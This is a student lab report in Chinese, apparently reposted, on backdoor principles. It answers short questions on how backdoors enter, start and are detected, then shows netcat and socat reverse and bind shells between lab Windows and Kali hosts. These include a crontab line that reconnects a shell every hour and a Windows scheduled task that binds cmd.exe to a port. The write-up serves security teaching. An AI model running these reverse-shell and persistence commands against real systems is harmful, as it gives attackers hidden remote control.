20155205 郝博雅 Exp2 後門原理與實踐

時間 2019-12-11

標籤博雅 exp2 exp 後門原理實踐欄目 Windows 简体版

原文原文鏈接

20155205 郝博雅 Exp2 後門原理與實踐

1、基礎問題回答

後門（木馬）linux

專用程序
投放
隱藏（免殺）
啓動（自啓動、綁定）

(1)例舉你能想到的一個後門進入到你係統中的可能方式？

答：上學期信息安全技術作過一個實驗：經過"掛馬"網站主頁中的 < iframe > 代碼連接一個網址（即一個網頁木馬），在用戶訪問此網站時，使用戶主機自動訪問網頁木馬。網頁木馬在獲得用戶鏈接後，自動發送安裝程序給用戶。若是用戶主機存在MS06014漏洞，則自動下載木馬安裝程序並在後臺運行。還有多是別人u盤攜帶了木馬，不當心插到本身電腦上就涼涼了。web

(2)例舉你知道的後門如何啓動起來(win及linux)的方式？

答：在以前實驗中，後門是能夠把本身的名字改爲相似於xindows自身可執行文件的，這樣windows就沒法發現有木馬，而後木馬會自動鏈接服務器啓動。還有一種是相似於釣魚網站同樣，你覺得點的是普通的頁面，實際上是假裝後的後門。shell

(3)Meterpreter有哪些給你映像深入的功能？

答：監控攝像頭讓我感受很可怕，由於以前看到過不少家庭攝像頭被控制的案例，沒想到本身也能監控別人的攝像頭（雖然比較低級），但這個真的讓我更加提升了安全意識。windows

(4)如何發現本身有系統有沒有被安裝後門？

答：上學期上婁老師的課時學了pid，當時搜到一種方法：經過netstat -anltp命令可查看到當前鏈接信息及創建鏈接的進程pid，kill掉可疑鏈接的進程，且已知進程pid能夠執行ls -al /proc/pid值，經過exe對應位置找到後門文件路徑。安全

2、實驗準備

Windows得到Linux Shell

在win裏使用ipconfig查看本機的IP地址

在win中，輸入ncat.exe -l -p 5205監聽本機5205端口
在kali下，輸入nc 172.30.7.113 5205 -e /bin/sh(使用nc指令的-e選項反向鏈接Windows主機的5205端口)
能夠看到win下成功得到kali的shell

Linux得到Windows Shell

在kali中查看虛擬機的IP地址

這兩步和上面的同樣，只不過把地址改爲了kali的，並且是win反向鏈接kali服務器
kali得到win的shell：tcp

使用nc傳輸數據

win輸入ncat.exe -l 5205監聽端口
kali輸入nc 172.30.7.113鏈接到端口
這樣就能夠傳輸數據了：

3、實驗內容

『使用netcat獲取主機操做Shell，cron啓動』

在win下輸入ncat.exe -l -p 5205監聽本機5205端口
查看crontab的幫助文檔，知道crontab指令能夠用於設置週期性被執行的指令。
使用crontab -e指令編輯一條定時任務
在最後一行添加45 * * * * /bin/netcat 172.30.7.113 5205 -e /bin/sh,在每一個小時的第45分鐘反向鏈接Windows主機的5205端口
時間到了45分時，得到了kali的shell，能夠看到第一行顯示了以前我輸入但由於時間沒到沒有顯示的lslsls。

『使用socat獲取主機操做Shell, 任務計劃啓動』

在Windows系統下，打開控制面板->管理工具->任務計劃程序，建立任務，填寫任務名稱後，新建一個觸發器工具
在操做->程序或腳本中選擇你的socat.exe文件的路徑，在添加參數一欄填寫tcp-listen:5215 exec:cmd.exe,pty,stderr，這個命令的做用是把cmd.exe綁定到端口5205，同時把cmd.exe的stderr重定向到stdout上：
建立完成後手動運行任務
在kali下輸入socat - tcp:172.30.7.113:5205即可得到win的shell：網站